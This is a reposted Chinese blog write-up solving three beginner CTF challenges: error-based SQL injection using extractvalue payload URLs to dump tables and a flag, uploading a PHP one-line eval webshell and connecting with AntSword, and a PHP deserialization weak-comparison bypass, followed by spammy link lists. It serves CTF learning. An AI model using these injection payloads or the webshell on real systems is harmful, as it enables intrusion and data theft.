当前位置: 首页 > wzjs >正文

北京工程建设交易中心网站百度下拉框推广网站

wzjs 2025/9/9 20:15:36
北京工程建设交易中心网站,百度下拉框推广网站,网站开发工程师职业定位,网站设置主页目录 [SWPUCTF 2021 新生赛]error 1、题目 2、知识点 3、思路 [LitCTF 2023]作业管理系统 1、题目 2、知识点 3、思路 [HUBUCTF 2022 新生赛]checkin 1、题目 2、知识点 3、思路 [SWPUCTF 2021 新生赛]error 1、题目 2、知识点 数据库注入、报错注入 3、思路 首先…

目录

[SWPUCTF 2021 新生赛]error

1、题目

2、知识点

3、思路

[LitCTF 2023]作业管理系统

1、题目

2、知识点

3、思路

[HUBUCTF 2022 新生赛]checkin

1、题目

2、知识点

3、思路

[SWPUCTF 2021 新生赛]error

1、题目

2、知识点

数据库注入、报错注入

3、思路

首先,输入一个1

输入1'

数据库语句报错,且报错信息有回显出来,加入注释符

正常回显,说明当前的闭合方式正确,为单引号的闭合,使用报错函数extractvalue

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,database())) --+

得到数据库名为:test_db

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test_db'))) --+

得到两个表:test_tb,users

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'))) --+

test_tb表的两个字段为:id,flag

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='users'))) --+

users表的三个字段:id,username,password

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(flag) from test_db.test_tb))) --+

得到flag的前半段,这里以为另外一半藏到别的地方,其实是没完全显示出来,使用函数substring

substring()

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select substring(group_concat(flag),32,30) from test_db.test_tb))) --+

合并起来的flag:NSSCTF{eed0ee27-1b46-4520-a7b5-71dd9183d446}

[LitCTF 2023]作业管理系统

1、题目

2、知识点

文件上传,蚁剑连接

3、思路

右键,查看源码,发现登录名和密码

登录上去

这里有很多功能,我们可以上传一句话木马文件 flag.php

<?php
@eval($_POST['cmd']); #一句话木马
?>

这里我们可以知道上传到根目录下

上传成功后使用蚁剑连接

连接成功后在根目录找到flag文件

打开flag文件,得到flag

得到flag:

NSSCTF{d0dc1586-48ed-4661-8b97-02fd17bf0cd4}

[HUBUCTF 2022 新生赛]checkin

1、题目

2、知识点

PHP反序列化,数组

3、思路

题目给了我们一段代码

$data_unserialize['username']==$username&&$data_unserialize['password']==$password

审计代码,意思是username和password的值反序列后的值要相同,这里使用了弱类型比较(==)

代码中给了两个值,先进行序列化后上传看看,使用在线网站

PHP 在线工具 | 菜鸟工具 (jyshare.com)

<?php
$info = array(
    'username'=>"this_is_secret",
    'password'=>"this_is_not_known_to_you"
);
echo  serialize($info);

http://node5.anna.nssctf.cn:25489/?info=a:2:{s:8:"username";s:14:"this_is_secret";s:8:"password";s:24:"this_is_not_known_to_you";}

flag没有出来,因为username和password的值更改了,我们不知道具体的值是什么

这里我们就要考虑怎么使两个值相同

弱比较中,true和非空、非零字符串弱比较(==)都是为true,所以我们使两个字段的值都为true

<?php
$info = array(
    'username'=>true,
    'password'=>true
);
echo  serialize($info);
 

将得到的值传给info

得到flag:NSSCTF{5713f43e-708e-458e-a6fc-fd82c254f8d3}

这篇文章就先写到这里啦,哪里不懂的或者哪里不足的欢迎批评指正


文章转载自:

http://lBQZm65t.wqtzs.cn
http://Ao5bqGtZ.wqtzs.cn
http://tiCXqP09.wqtzs.cn
http://mVQvrAcf.wqtzs.cn
http://0NMpP8hu.wqtzs.cn
http://h1DcbpQs.wqtzs.cn
http://AnJ05hTo.wqtzs.cn
http://fXToLbjK.wqtzs.cn
http://bJvxkegA.wqtzs.cn
http://chUDpzVi.wqtzs.cn
http://MHTL5Q7B.wqtzs.cn
http://GKQWXQKl.wqtzs.cn
http://ojslKMdM.wqtzs.cn
http://gaVwUZr6.wqtzs.cn
http://OJGN61R3.wqtzs.cn
http://aVFLtRmP.wqtzs.cn
http://3aIjdjco.wqtzs.cn
http://zKSKQOB7.wqtzs.cn
http://XkLnpTt1.wqtzs.cn
http://4doocg6o.wqtzs.cn
http://XI2BbOef.wqtzs.cn
http://NHQtKad1.wqtzs.cn
http://At4Dclxp.wqtzs.cn
http://azZFBrI7.wqtzs.cn
http://wozczrtl.wqtzs.cn
http://DkDdrikT.wqtzs.cn
http://51OkSBzt.wqtzs.cn
http://Z10Z7unO.wqtzs.cn
http://3wGVNBOC.wqtzs.cn
http://NKCVCRAL.wqtzs.cn
http://www.dtcms.com/wzjs/671768.html

相关文章:

  • 什么是做自己的网站英国搜索引擎
  • 屏山县建设局网站有机玻璃东莞网站建设技术支持
  • 怎么用网吧电脑做网站服务器吗免费域名注册万网
  • 做的好的h游戏下载网站国外网站建设素材
  • 昆山住房和城乡建设局网站旅游网站介绍怎么写
  • 网站建设找a金手指wordpress 使用七牛云
  • phpcms 关闭网站邢台招聘信息网
  • 网站怎么做关键词优化牡丹江整站优化
  • 北京网站设计网站公司新开的网页游戏大全
  • 广西南宁网站建设有限公司中国建筑工程考试网
  • 四川住房建设厅网站首页yellow的视频播放
  • 杭州软件网站建设农业开发公司企业网站建设
  • 包头索易网站建设注册网站免费
  • 呼和浩特市做网站公司好的佛山大良网站建设招聘
  • 做网站的学什么代码seo关键词优化推广
  • 网站搜索不出来网站代码案例
  • 小程序可以做网站吗中国酒店设计网
  • 门户网站推广方式建设部政务网站建设
  • 网站关键词快速优化网络营销有哪些特点及功能
  • 个人网页设计过程展示如何做好网站关键词优化
  • 中国建设造价信息网站网页设计如何居中
  • 个人网站可以做淘宝客吗上海贸易公司名录
  • 最优秀的佛山网站建设深圳最专业的高端网站建设
  • 网站开发项目小组成员职责李佳琦网络营销方式
  • 免费seo搜索优化wordpress用户注册优化
  • 免费外贸网站有哪些宜宾市做网站多少钱
  • 网站模板库免费广西建设工程质量安全监督总站网站
  • 网站建设分为火车头采集并自动发布到wordpress
  • 十年前网站开发语言网页设计心德体会500字范文
  • 如何访问国外网站网页设计作业怎么做